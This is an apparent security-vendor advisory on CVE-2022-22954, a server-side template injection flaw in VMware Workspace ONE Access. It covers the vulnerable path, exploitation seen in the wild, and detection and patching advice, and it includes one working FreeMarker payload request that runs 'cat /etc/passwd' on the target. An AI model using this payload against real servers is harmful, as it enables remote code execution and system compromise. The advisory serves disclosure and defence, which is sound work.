VMware Workspace One Access and Identity Manager Template Injection Vulnerability VMware Workspace ONE Access, which was formerly known as Identity Manager, is vulnerable to a Server-Side Template Injection identified as CVE-2022-22954. This vulnerability is being actively exploited in the wild and has also been employed by loader stages of malware ...
VMware Workspace One Access and Identity Manager Template Injection Vulnerability
VMware Workspace ONE Access, which was formerly known as Identity Manager, is vulnerable to a Server-Side Template Injection identified as CVE-2022-22954. This vulnerability is being actively exploited in the wild and has also been employed by loader stages of malware like Mirai to download more malware into an infiltrated web server.
Server-Side Template Injection Attack
A Server-Side Template Injection (SSTI) vulnerability exists when a web application allows a user to input data into it which eventually becomes part of a back-end template used to generate dynamic content for the website.
It has been noticed, of late, that a good number of web applications receive user input without any sanitization and is used in the construction of the template leveraged to create the dynamic web content. This sometimes leads to the unintended execution of the user-provided content, which leads to code execution on the server’s end and eventual the server takes over. In some cases, SSTI may not lead toan immediate remote server compromise but would still allow the attacker to gain a foothold on the webserver from where the attacker could launch other exploits leading to full compromise.
As seen in the case of this template injection vulnerability in VMware One Access, attackers were able to chain the exploit with CVE-2022-22960 to gain privilege escalation.
VMware Vulnerability, Triggering Mechanism and Consequences
The URI path /catalog-portal/ui/oauth/verify?error=&deviceUdid=
is vulnerable to a template injection attack. The Freemaker Java Template Engine provides a Class named Execute which allows the execution of externally provided commands. It is this vulnerability that’s exploited in the wild and identified as CVE-2022-22954. A request as shown below will lead to the execution of “cat /etc/passwd” on the target system.
GET http://(Server)/${“freemarker.template.utility.Execute“?new()(“cat /etc/passwd“)}
The “Execute” Class is invoked remotely and the command “cat /etc/passwd” executes locally on the webserver. This command could be replaced with any command that would allow the attacker to achieve their objective, which could be downloading and executing more malware using curl, privilege escalation exploits using CVE-2022-22960 or another CVE etc. There have also been reports of CVE-2022-22954 being used to upload web shells, like Dingo J-spy onto infiltrated hosts.
Threat Severity
The end result of successfully exploiting this vulnerability will be the attacker executing code remotely on VMware Workspace ONE Access installations. On Vehere’s threat severity scale which classifies threats as low, medium, high and critical, this threat falls under the high severity category. It can lead to complete system compromise and exfiltration of sensitive data.
Vehere Detection and Best Practice Recommendation
Vehere’s Situational Awareness product, PacketWorker, has the rule identified as “CVE-2022-22954 Vmware Workspace One Access Identity Manager vulnerability” developed by our security research lab to detect malicious HTTP requests sent to VMware Workspace ONE Access to trigger the vulnerability. In addition to this, as a best practice, we would recommend the internet community to have their systems patched or employ the workarounds recommended by VMware according to the following links
https://kb.vmware.com/s/article/88098
https://kb.vmware.com/s/article/88099
References
https://github.com/sherlocksecurity/VMware-CVE-2022-22954
https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html
https://www.chrisstewart.ca/vmware-threats-being-exploited-in-the-wild/